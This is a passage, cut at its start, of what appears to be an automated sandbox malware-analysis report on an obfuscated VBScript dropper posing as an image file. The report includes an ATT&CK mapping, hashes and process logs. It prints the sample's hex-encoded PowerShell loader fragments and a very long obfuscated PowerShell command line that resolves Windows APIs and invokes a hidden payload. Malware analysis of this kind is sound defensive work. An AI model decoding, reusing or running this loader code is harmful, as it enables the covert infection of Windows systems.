'A28091A88A81908980AD848B818980';$Hdlc6=HTB 'B7B1B69580868C8489AB848880C9C5AD8C8180A79CB68C82C9C5B59087898C86';$Hdlc7=HTB 'B7908B918C8880C9C5A8848B84828081';$Hdlc8=HTB 'B78083898086918081A180898082849180';$Hdlc9=HTB 'AC8BA880888A979CA88A81908980';$Styrketrne0=HTB 'A89CA180898082849180B19C9580';$Styrketrne1=HTB 'A689849696C9C5B59087898C86C9C5B68084898081C9C5A48B968CA689849696C9C5A490918AA689849696';$Styrketrne2=HTB 'AC8B938A8E80';$Styrketrne3=HTB 'B59087898C86C9C5AD8C8180A79CB68C82C9C5AB8092B6898A91C9C5B38C9791908489';$Styrketrne4=HTB 'B38C9791908489A489898A86';$Styrketrne5=HTB '8B91818989';$Styrketrne6=HTB 'AB91B5978A91808691B38C9791908489A880888A979C';$Styrketrne7=HTB 'ACA0BD';$Styrketrne8=HTB 'B9';function fkp {Param ($v_m, $v_p) ;$Leucifer0 =HTB 'C193908B88C5D8C5CDBEA49595A18A88848C8BB8DFDFA6909797808B91A18A88848C8BCBA28091A49696808887898C8096CDCCC599C5B28D809780C8AA878F808691C59EC5C1BACBA2898A878489A49696808887899CA684868D80C5C8A48B81C5C1BACBA98A8684918C8A8BCBB695898C91CDC1B6919C978E8091978B80DDCCBEC8D4B8CBA09490848996CDC1AD818986D5CCC598CCCBA28091B19C9580CDC1AD818986D4CC';&($Styrketrne7) $Leucifer0;$Leucifer5 = HTB 'C1938497BA829584C5D8C5C193908B88CBA28091A880918D8A81CDC1AD818986D7C9C5BEB19C9580BEB8B8C5A5CDC1AD818986D6C9C5C1AD818986D1CCCC';&($Styrketrne7) $Leucifer5;$Leucifer1 = HTB '97809190978BC5C1938497BA829584CBAC8B938A8E80CDC18B908989C9C5A5CDBEB69C96918088CBB7908B918C8880CBAC8B9180978A95B68097938C868096CBAD848B818980B78083B8CDAB8092C8AA878F808691C5B69C96918088CBB7908B918C8880CBAC8B9180978A95B68097938C868096CBAD848B818980B78083CDCDAB8092C8AA878F808691C5AC8B91B59197CCC9C5CDC193908B88CBA28091A880918D8A81CDC1AD818986D0CCCCCBAC8B938A8E80CDC18B908989C9C5A5CDC193BA88CCCCCCCCC9C5C193BA95CCCC';&($Styrketrne7) $Leucifer1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,[Parameter(Position = 1)] [Type] $vrt = [Void]);$Leucifer2 = HTB 'C1B3B1A7C5D8C5BEA49595A18A88848C8BB8DFDFA6909797808B91A18A88848C8BCBA180838C8B80A19C8B84888C86A49696808887899CCDCDAB8092C8AA878F808691C5B69C96918088CBB78083898086918C8A8BCBA49696808887899CAB848880CDC1AD818986DDCCCCC9C5BEB69C96918088CBB78083898086918C8A8BCBA0888C91CBA49696808887899CA7908C89818097A48686809696B8DFDFB7908BCCCBA180838C8B80A19C8B84888C86A88A81908980CDC1AD818986DCC9C5CJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts21
Command and Scripting Interpreter		Path Interception11
Process Injection		11
Process Injection		OS Credential Dumping1
Process Discovery		Remote ServicesData from Local SystemExfiltration Over Other Network MediumData ObfuscationEavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default Accounts321
Scripting		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
Deobfuscate/Decode Files or Information		LSASS Memory1
Application Window Discovery		Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain Accounts1
PowerShell		Logon Script (Windows)Logon Script (Windows)321
Scripting		Security Account Manager1
File and Directory Discovery		SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
Obfuscated Files or Information		NTDS12
System Information Discovery		Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 755530 Sample: IMG_2022028022-0120.vbs Startdate: 28/11/2022 Architecture: WINDOWS Score: 64 17 Potential malicious VBS script found (suspicious strings) 2->17 7 wscript.exe 1 1 2->7         started        process3 signatures4 19 VBScript performs obfuscated calls to suspicious functions 7->19 21 Wscript starts Powershell (via cmd or directly) 7->21 23 Obfuscated command line found 7->23 25 Very long command line found 7->25 10 powershell.exe 5 7->10         started        process5 signatures6 27 Very long command line found 10->27 13 conhost.exe 10->13         started        15 powershell.exe 10->15         started        process7

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
IMG_2022028022-0120.vbs0%VirustotalBrowse
IMG_2022028022-0120.vbs0%ReversingLabs

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

World Map of Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:36.0.0 Rainbow Opal
Analysis ID:755530
Start date and time:2022-11-28 19:37:48 +01:00
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 8m 22s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:IMG_2022028022-0120.vbs
Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:14
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Detection:MAL
Classification:mal64.evad.winVBS@6/2@0/0
EGA Information:Failed
HDC Information:Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 9
  • Number of non-executed functions: 0
Cookbook Comments:
  • Found application associated with file extension: .vbs
  • Override analysis time to 240s for JS/VBS files not yet terminated

Warnings

  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, svchost.exe
  • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com
  • Execution Graph export aborted for target powershell.exe, PID 6032 because it is empty
  • Not all processes where analyzed, report is missing behavior information
  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASNs

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0yp3j2cq.0wp.psm1

Download File
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:very short file (no magic)
Category:dropped
Size (bytes):1
Entropy (8bit):0.0
Encrypted:false
SSDEEP:3:U:U
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA1:356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:false
Reputation:high, very likely benign file
Preview:1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1go55f2h.l20.ps1

Download File
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:very short file (no magic)
Category:dropped
Size (bytes):1
Entropy (8bit):0.0
Encrypted:false
SSDEEP:3:U:U
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA1:356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:false
Reputation:high, very likely benign file
Preview:1

Static File Info

General

File type:ASCII text, with CRLF line terminators
Entropy (8bit):5.08517872813569
TrID:
    File name:IMG_2022028022-0120.vbs
    File size:837420
    MD5:752418aa9de96e0fc941ae1e7e33c906
    SHA1:bb67df2d8a4b525b42211630386e4b51a97255a3
    SHA256:cdce0391762117cc926a2131b5e0ec7724b69d1224dbabc7a3f351dfebf9b9bf
    SHA512:930b079189279aa377bca9b64471ecd0956522715e89eebc1a818166bbd6d309491ec6bd8714d4cc5db34ca824627b2e087e79f7b1d9ad7033c38dfd0d56c3c7
    SSDEEP:12288:S6SeO/ZNca+0J/FEituFvSnQ+7XPwVr2rhs+MDRpmrtVUBM/LB2g+ZImPkQN3BSq:EKpfTGVKaQNxSq
    TLSH:1E05A06394151590870DADAE884ADDF8CCA1021EB513241607B0BB7E2F6F8E8BDDB5DF
    File Content Preview:Un9 = Un9 & "cQGbcQGbge0"..Un9 = Un9 & "AAwAAcQGb6w"..Un9 = Un9 & "LhDItUJAjrA"..Un9 = Un9 & "rL/cQGbi3"..Un9 = Un9 & "wkBOsCqLX"..Un9 = Un9 & "rAmpUietxAZ"..Un9 = Un9 & "txAZuBw5wAA"..Un9 = Un9 & "ABxAZtx"..Un9 = Un9 & "AZtTc"..Un9 = Un9 & "QGb6wJJP"..Un

    File Icon

    Icon Hash:e8d69ece869a9ec4

    Network Behavior

    No network behavior found

    Statistics

    CPU Usage

    Click to jump to process

    Memory Usage

    Click to jump to process

    High Level Behavior Distribution

    Click to dive into process behavior distribution

    Behavior

    Click to jump to process

    System Behavior

    General

    Target ID:0
    Start time:19:38:41
    Start date:28/11/2022
    Path:C:\Windows\System32\wscript.exe
    Wow64 process (32bit):false
    Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\IMG_2022028022-0120.vbs"
    Imagebase:0x7ff7b76c0000
    File size:163840 bytes
    MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    General

    Target ID:1
    Start time:19:38:49
    Start date:28/11/2022
    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Wow64 process (32bit):false
    Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Badeanstalt = """reFLiuEfnBrcExtApiHjoStnBu HyHFlTDuBSp su{Hi Cl An Pa BapinaCarZiaSomVo(Cz[PaSDetalrCaiennOugDe]Ca`$UdHBaSUd)Fr;Ag At Ud Ho Af`$UsBeuyAktNoePasBo Sa=Sn ThNAneNowBo-MuOGrbEpjLoeDdcBetHu TobPayVrtSeeLa[Al]Po Bd(Me`$VaHTnSDe.ReLPeeNonVegMatunhSl Re/Sk Di2Gi)Ko;Un ge Ma Is GeFFloLerWi(fe`$HaiOp=om0Pe;Fu Ma`$PhiDo Ge-MaltitSe Fa`$SyHBeSBa.DoLUneDenScgDotUnhCa;Do Un`$reiom+Re=Be2Du)Va{Fl Pl Re Ad Ot ta Sp Sk Ho`$DoBFeyDetLeegasSm[Fi`$geiAf/na2De]Od Ge=Sa Tr[RecSkoUnnLivKresirOrtBr]Il:Me:DaTDioDiBBoyPatGleSu(Po`$UsHHeSPh.boSFruAfbNesMatUnrPriPonUngLa(Il`$StiPa,Su Jo2Po)Ca,Bl Af1Sn6Du)No;Ma Te Un`$miBKryPrtCheGtsPa[Du`$SyiUn/Tr2Fi]Mi Ta=Ha Ah(Fo`$SiBbiyIntOpeovsOl[Kb`$spiHe/Ar2Fr]Fe Ci-FrbRexEnoPhrTi Hy2St2Re9La)lo;so Le De Ca Vr}Re Un[MuSkutSqrLaiApnNogBl]Pe[MaSChyInsDetpaeNemSt.VaTBaeKaxIbtBi.ReEManPlcGeourdPriMonPrgSy]Si:Ko:RaAUdSAkCWaIFoIsa.MoGBaeButTaSGutUnrFriUlnIngBa(Ba`$FobSeyPitTheAnsId)li;Bl}Ga`$DeHBrdSalUncIr0Sk=KrHOuTBeBAf Ry'BeBRe6te9SpCBe9Be6Pr9Gr1js8Et0Am8In8SeCEnBCa8co1In8Ta9Pr8Cr9De'Sy;Lu`$plHRvdaflFocIn1De=TrHDiTZiBVe Un'FeAKr8Re8TaCDe8Sl6Gr9Ag7is8XyASv9Sp6Sh8CaAHe8De3Bl9An1unCTiBteBAb2Ha8SmCUr8SuBCuDbu6LkDTi7MaCMeBSeBDe0As8TrBCh9Ah6Me8To4Pr8Ne3Fr8In0boAReBRa8st4Ti9Ve1un8ApCOp9dk3Bi8Co0SuACl8An8en0Un9In1Mo8DeDAn8PeAUd8Wu1Ra9Ca6Ba'Fo;El`$LoHBldNolSucBo2Ne=TnHBlTUnBSp Ne'siAFi2Sk8Ti0Di9Ul1tyBLo5Ob9Fi7no8ByACe8An6PoALa4Da8Bi1Ka8Im1Wh9Gt7lo8Ge0Rr9Br6Br9Di6Ar'Fl;gr`$CyHEidArlblcPr3pr=OvHenTnoBCo Ta'LeBUn6re9UpCGu9Sn6Gn9Fa1Br8Mo0Da8Pr8LyCOvBBeBwa7Sk9Fo0Sa8MaBDe9Ev1Af8KaCBa8Oc8Sc8He0NoCObBFoAToCDe8SiBSi9Se1Be8Or0Se9No7Fl8HuAOu9ty5RaBCo6Kr8Sk0dd9Se7As9Ri3Le8laCBr8we6Ou8Di0oc9Be6DaCKaBTeAUnDPu8Se4St8IsBEr8si1Ja8Ng9Li8Sp0FoBDi7Ci8Ex0Vi8st3sl'Sk;De`$FlHPedJalJdcTi4Ki=KlHStTPrBFo Ge'Th9fi6Af9Sy1Af9Re7He8CrCWi8FoBSt8Ov2Be'Bl;Al`$AnHIndaclFocBu5Ta=OvHDeTWhBUn Ca'UdADe2Sy8Pi0In9Af1CaARi8Ha8PrAno8Sl1Py9Du0Gn8Ki9Ud8Po0MuAUnDNe8No4Ud8EpBAc8vi1Bj8Sp9St8Op0An'Af;Se`$OrHBydGrlCicFo6hm=CeHSkTInBHa Di'FaBIn7ApBin1waBbe6Em9Re5sa8No0Wo8Ai6mi8MiCBa8Pa4Sh8El9NoAStBFo8Un4Ko8Om8Lo8Ro0StCfo9ChCco5SyAJuDAg8AfCCo8In1Ps8In0FrAMi7Se9LaCTaBBr6er8TiCAp8Hu2PoCEp9SuCLo5miBRe5Ps9No0Wa8Ko7St8Sa9po8FuCCr8Eg6No'in;Hu`$InHCadUdlRocSt7mi=ReHPrTroBZe da'NeBPa7Ri9Di0Un8chBgn9Ea1Ku8SkCMe8Pr8Su8Di0OvCKa9MoCSa5SwAUd8Un8Bl4si8DiBLy8Un4ur8Gl2Fa8Fi0wh8Ne1Sc'Wa;Dd`$DeHOpdSelNocAz8Tr=ByHDiTSiBPy ev'AvBUn7Di8tr0Om8In3Ma8Fr9pr8ud0Pr8Fe6Tr9Br1Sl8Mi0Gr8In1biAVe1Hy8Sv0Ur8Hv9Pl8Bl0Kl8Ph2Ni8Se4Fa9Fy1Xy8ch0Na'Sa;Dr`$CoHAfdDolVocEn9nd=PiHKoTAsBEf In'PsAPrCGl8MuBFeATa8Fo8Kp0Un8Re8Co8UnAMe9Bl7At9GlCFoAFr8ny8ElAMi8Ek1Fy9St0Ek8Mi9He8Vr0Me'Re;Sv`$ReSActInyKarRekGoeArtunrHynWaeMu0Ov=InHAlTEtBBo Sk'SkAde8Sh9DeCPrASh1Ri8Sc0Va8Re9Ko8Co0sc8Da2St8Af4By9Sy1mi8Af0SuBHo1St9FeCfl9An5Ma8Ob0Cl'tr;Fo`$beSBatDiyAnrSukReeWatOprSunTheSt1Ch=AsHBeTLiBSk Le'SpAma6hs8mo9No8Da4Ha9Sa6ve9Po6stCUn9KoCNe5EnBSq5Pi9St0lo8Rn7Ch8Tw9Ud8BrCHy8fo6UnCfu9roCPh5PrBPa6Tm8Fe0Mi8Or4bl8Pr9Ra8Fa0Pr8Us1GlCLy9SkCte5ScAPo4To8AdBSe9Ur6Pu8MeCnaASu6Kr8Ch9Kl8Mo4Hy9Re6Sn9Ya6IcCFr9PaCAt5PlAre4De9St0Te9Op1Ep8NiASpASu6El8Ab9Me8No4Md9My6Sp9de6So'Ma;In`$KiSFotNoyGrrSukEpeMitDerVenMueFl2Ov=rlHPaTBrBKa Da'FjACoCDe8PiBOp9Fr3My8UdAUn8ArEGl8Fl0Gr'By;Hj`$NaSFatBuyBerDakReeRetAtrAfnBeeSt3Fo=TiHTvTTfBHe Br'DoBEs5Ha9Re0Ka8En7Cy8Ch9Bu8FoCPr8Ta6KiCIn9KoCSe5PaATrDHa8CoCFr8Om1Fe8Hj0HaACa7In9SkCReBUn6Co8SaCKe8Fo2VeCKo9FaCli5PeAmeBIn8Bi0Th9Pr2BiBHa6Bi8Un9Mi8viAGe9To1ovCBu9BlCAk5RyBUn3Sy8KnCCo9Sp7br9Dy1Ma9Pr0Id8Kr4Te8Fr9Ti'Sp;Ma`$AkSKatSaySkrOxkgoelutStrPinPaeLo4Su=AvHPaTfaBKa Be'tiBAr3Ka8LiCKa9Pr7Un9Wa1My9fo0Co8Va4Mi8Si9SoARi4Nu8Mm9Sy8Sj9Ot8hjASt8Eq6Vs'St;Op`$ReSKetSiySurKekKoePhtKlrDinPaebe5Se=CaHomTUnBJa Bi'Se8StBUs9As1Sn8Cy1Ge8Be9Sv8Ca9Gn'Ph;Hi`$SmSAntWoyMarMakCleRytRerPhnHaeAe6pr=NoHDoTFoBTu ym'SkAAfBUn9Pu1ChBRa5Tr9Sv7Af8GoAKu9Co1Sp8Sa0Bo8Ar6Ga9Ca1snBIn3Pl8DuCSu9Be7Be9Bi1Lo9Is0Bl8fr4Li8Sa9udANy8Br8Bu0Pr8Fe8Su8IdAWi9Eg7Mi9SuCSr'Ta;po`$TjSNutScyrorNekSteLrtKfrAnnUneSt7bo=SkHKwTDeBEk Sp'TrAFoCQuAEk0SpBCoDDk'le;Ab`$UnSNatWoygurKokCheSetStrVenMoeCh8yv=BrHGlTNoBFe Ne'GoBBo9We'St;TefNeuBlnencAstMeiploDanFo spfFakFoplu tr{sePCoaMerKlaTimIm Hk(Me`$MavSp_BemDe,Ro Tu`$Amvin_DipBu)Ra Re Du Su To Ab;Li`$DiLCheNyuSncTyiYdfGaeStrUt0In Un=osHLiTReBFa Se'MuCDu1fj9Sa3Ce9Bu0Sc8KaBHo8Ta8ShCAn5EsDLa8PrCGi5fjCGoDexBFrEVaAHl4Ma9In5Pe9Ty5FoAKo1De8TuASk8Ni8Ag8ur4Fi8UnCKi8GaBReBSt8urDPeFLoDBeFKnAUn6Ma9Ve0Sa9An7Su9St7De8Fl0Fo8alBCe9Be1GeAOm1On8AgARa8Pr8Tv8Si4Sa8PaCNo8NoBBaCDiBApAFo2Br8aa0Un9Me1UdADr4We9Su6Fe9pl6Sc8Ne0Sk8Ge8In8Ro7Un8Dr9Fl8DrCun8Sy0Ha9Da6LeCTrDPeCStCMoCAf5Vo9Au9UpCBe5CaBRe2Hy8RiDBe8de0Pe9Ge7Ne8re0AlCBl8ryAKiATi8Sa7En8BeFSa8Re0Mt8Be6Sm9In1AgCAl5To9BeEVaCHo5TvCCo1SaBCaAOuCweBPrAOv2Op8Ke9Ko8OpApo8Pr7Pr8Af4Wi8Ab9AfAFo4Ha9Cl6re9Se6Fr8In0Pi8Au8Sy8Su7mo8Sr9kr9ImCReAUp6Ba8Li4Se8Re6De8AfDSk8li0SyCIs5FoCSu8MeAMe4So8BiBco8Hu1DoCRd5UnCFi1SkBMaAMaCNoBDuADd9El8PaAAf8Ja6St8Di4Na9Ba1Ti8AdCal8FaAAv8PlBPoCIsBToBAs6Fa9Im5Ud8Bo9Ro8LeCTr9Fa1CaCQuDskCLs1InBMo6Tw9Ta1Oc9peCCa9Co7Na8FrECo8Gr0Ma9ps1Ap9Ha7Mu8FrBGr8Sp0HoDLiDFeCAuCVaBHeEStCDe8SaDTr4SoBRe8MeCFrBReAPe0St9Br4Fr9Rs0Kd8An4Pr8So9ba9Na6EuCCaDLiCbz1SpASkDSu8vo1Im8De9Hu8Ov6SaDSc5PrCAtCSyCSc5Ho9ok8KrCDaCHjCGaBHaAKo2Ma8Fi0Ti9Ka1VgBUn1Ra9LyCTe9ud5Af8An0TrCBlDSiCTe1SkALeDAb8Ku1Ba8Ur9Bu8Ra6DdDSk4TrCSyCUs'Re;St&Fr(Gr`$TeSSvtUhyCorFokMoeBetGirUnnGueAf7Ro)In St`$KrLCoeDeuVecUdififAseRarDj0ph;Fe`$StLAxeFiuGlcAniCrfUpeSvrba5Bl st=Wa SkHUnTUnBAr Kl'PaCRa1Ot9No3La8Pa4So9Ka7AcBVeAAd8Ti2St9Py5Ti8Bo4MeCFr5EnDCh8DrCMu5teCRe1Sc9Un3St9Kr0Be8PhBTo8Pe8ToCopBChATe2Be8Ca0Si9Ro1DuATa8Re8Or0Ou9Ya1Ja8QuDbe8GrAFi8Ba1brCHeDAnCbl1MoANoDCh8Ro1Ge8Sp9Bu8An6DeDBe7NaCSv9DiCDi5CoBBoEMeBCo1Gl9BrCSk9Se5An8Ad0CoBPrELuBEx8FuBGe8KoCSu5TiAVa5SoCClDfjCPo1SnAInDFo8Pr1Hi8Bu9Sp8He6unDSk6MaCHo9BlCWe5ArCKe1CrAMaDAs8Sa1le8Ek9Bu8ti6ChDHa1BiCUnCLoCKeCMe'Ha;th&No(Ci`$SnSUntUnySkrLakAnePotsarXynKaeDe7De)Ex Ti`$ReLPreDouBrcDoiSufSeeSqrAn5Dy;gy`$BuLAneDruSccBriskfCaeAnrso1Lu Ba=Fa aeHSeTTrBKa Ca'Sk9Ri7cu8Te0Sp9ta1Va9Sk0Re9Dr7Fi8SiBHaCIn5KoCUn1La9Hu3Pa8Su4Ud9Be7UnBReAOu8pl2He9Br5Ub8li4DiCTyBToAPaCPi8DiBRe9Gr3In8EmASt8ElEFo8Jo0YeCDaDViCSt1kr8SsBfo9Sa0ho8Fl9ka8St9GrCSw9TeCSm5CaAAv5InCGoDMeBNsEPrBSu6le9elCCa9Ta6Kr9Ma1Fo8Sl0Fa8Fa8NoCUnBgrBTr7Bi9Hj0Ra8SiBPo9Be1Tv8RaCSk8Sk8Ha8Sp0RuCTaBAnAUnCEl8TvBWy9re1Pa8Yo0Wa9Bk7No8ViAEf9Bl5FoBEp6Se8Ci0Sa9Sk7El9Un3Me8FoCkl8Fe6Fi8Ut0No9Al6LeCBoBSaAArDLe8En4ak8nuBKa8Ma1cr8Se9Se8Gu0CrBPu7Ou8tr0La8Ep3FiBLs8SoCAfDAsAWiBMe8Fa0La9co2PoCpa8CiAOuAEr8to7Ca8ArFsa8Pa0To8gl6Do9Un1AfCFr5PeBNe6Bu9WiCGu9St6Cr9Ex1Ua8Ap0Op8Di8StCShBUrBBu7Al9No0Pi8HyBNo9Um1Ud8IaCIn8Sv8Ib8Ze0EkCCoBTeASvCGe8WoBTo9Va1Ca8Ab0Wo9Co7Ac8MoAUd9Sk5AfBGo6No8Ov0la9In7Or9bl3To8MaCTj8In6Ve8au0Hy9Ba6WoCKaByaAStDso8st4he8StBKo8Ve1Nu8Mi9Ko8Pi0DaBZa7Fu8Ab0Ti8Sy3HoCReDPrCPlDDeAOmBVo8de0Ga9Le2BrCBr8ToADeAFo8Ku7Ne8UdFLe8Ka0Gy8Di6Pr9Go1BuCPe5isAInCMo8IsBsu9Ti1FoBDi5Do9Un1Cl9De7MyCArCalCTa9SlCNo5PaCSpDLeCBe1Re9La3Mi9Br0Ud8AuBUl8Va8LiCArBHyAMi2Ra8in0Ts9Ro1AmABl8Fd8Fi0No9De1Gu8InDMo8UdASl8Am1GeCFiDDeCSc1TiAChDKi8Ba1To8ve9Wh8Cy6WaDTa0MoCCoCLgCReCPuCEjBSjAScCSk8SoBUn9Ex3Ma8KrAFr8SvEGo8un0OvCToDJaCPa1Di8UbBkr9Re0an8Tr9Ro8Or9loCFl9KvCRe5KuAPr5OvCAnDTrCTa1Tp9Ga3coBAnABd8Bl8BrCBeCPaCBrCPrCUnCPeCArCSkCHo9BrCSt5MiCTu1Ti9Ma3KoBReAgi9tw5BrCPhCMyCMuCSm'Ur;Ap&Ud(An`$ShSdetOsySurSkkFaeDitSprDanCeeAb7Ag)Pa Ch`$BeLReeSkutrcTaiChfEmeMarPl1Ca;Ob}TrfViusqnRecSitBriPaoArnNe KaGCaDDiTYd Vi{ErPSyaBirShaBemti To(Sk[StPinamorDeaSumToeTotKaeforKa(frPSkoSesTiiActCaitioWanEk De=Ba Ko0in,Py PuMbraPoneldEnaTitImoCorCoyVe Ha=Pr Tr`$WaTPhrChuNeeFu)Te]Vi Ar[BeTmeyHapsoeKk[ap]Ko]Pr Cc`$ElvKlaVerBy_VaphjaLirOkaunmPreRetUdeOvrKbsPo,Op[GoPClaStrSlaHemSaeLatKleSarEx(BaPPioAusAfiPrtGeiReoMunAf cu=Fr Cu1Od)Ta]Ca Sk[HeTGlyInpAneHu]Br Tr`$IsvTrrAdtBl Ab=Re Ko[PeVCuofliOvdBi]Re)Ve;Je`$TaLwheHeuMicDriisfByeCarFr2Pe St=Ti RoHAtTmoBFr sn'KaCSo1DeBAn3ToBTa1UnALi7PeCSa5alDUs8ReCCo5SiBSeEMoAYa4In9Va5Su9Or5OvARa1Ra8TiASk8Ka8Fs8Un4Cr8CaCba8PaBMiBAl8PlDKnFEkDVaFBiAVi6Va9et0Co9Cr7Om9Ep7De8Fa0Ve8SkBSp9Ch1fiARe1Sc8GaASt8Un8Ci8Go4Ku8SkCTi8BiBOvCPaBekAKn1El8Be0Br8ov3Na8WaCGa8EfBko8Fr0PoABl1Pl9DoCYa8SaBFo8Se4De8La8Ti8PlCPn8Co6DeAPi4Ar9Mi6No9Re6Il8Dr0No8te8Se8Vi7Re8An9Ma9UnCAlCBaDBlCExDGyAraBfo8Bl0Au9Bu2AtCTi8reADeASk8Gr7Ko8meFHo8Ve0St8fo6Sa9Ca1AmCFu5blBIn6Su9GrCRe9Sl6pu9mo1Ba8Ic0va8Dr8doCArBStBFo7Ku8Fl0Vi8Re3Mi8En9Mo8dr0Se8tr6Ch9Fr1Pe8IdCPa8NoASi8InBinCSkBAeANo4Tu9Sy6Or9Po6Ov8Ni0Ku8Mo8Xe8St7Pa8Gl9Sk9UdCSlASyBUn8Br4gs8Aw8Or8Ak0ApCFlDCoCMi1FlABeDTs8Op1Tw8se9Bu8Me6ciDOvDPrCRaCSiCReCNoCSt9RuCPr5InBBoESeBBl6Te9puCUn9Em6Pl9Pa1Ka8Be0Kl8Af8maCSwBPaBTr7Gu8Ku0St8In3Lo8Pa9Mi8Ku0Su8Ho6so9Fo1de8AdCTe8BeANo8AnBHyCVaBPsAGa0He8Re8Na8InCKu9Gy1FlCSpBLyAse4En9Ph6En9Sp6Pa8Fr0Gn8ur8Ly8sk7Fo8la9Sa9FlCCrAVa7Dn9Un0De8ShCPe8Cl9Bo8Di1Op8In0ti9Fo7ScAVr4el8Ha6Sn8Fo6Al8Mi0In9Al6Ca9Xe6TiBga8AnDPrFYoDkiFPeBEc7sy9an0Ex8HeBSuCPaCPrCDeBViAOv1Gr8El0Ka8Lu3Ex8ReCUp8BeBSe8Sp0UdAGm1Re9BaCBy8poBSt8Je4So8Au8Da8TaCCo8An6HyANo8un8SlAIn8Un1Un9Kl0Br8Wh9St8Pl0OsCHoDCoCNi1OpAGnDbo8Sm1Sv8Tu9Le8Sk6EdDDeCRoCMu9BaCHe5VoCHj1Ba8Tr3Ad8Pa4Kv8Bu9Lu9El6Bi8Ne0JoCSuCTrCBlBJeAFu1Ta8Al0Se8Bl3mo8NoCra8UnBWa8La0DeBti1An9LiCBi9Pi5Sa8Ba0OpCZeDPlCSu1RiBNe6Wh9Si1Fe9MaCRe9Br7Ki8DrEMi8St0Tr9Ma1So9Br7Di8CoBPr8Pu0BeDHu5FaCAr9DdCre5KlCpi1KaBMe6Cl9Wa1aa9SeCTo9Su7Bu8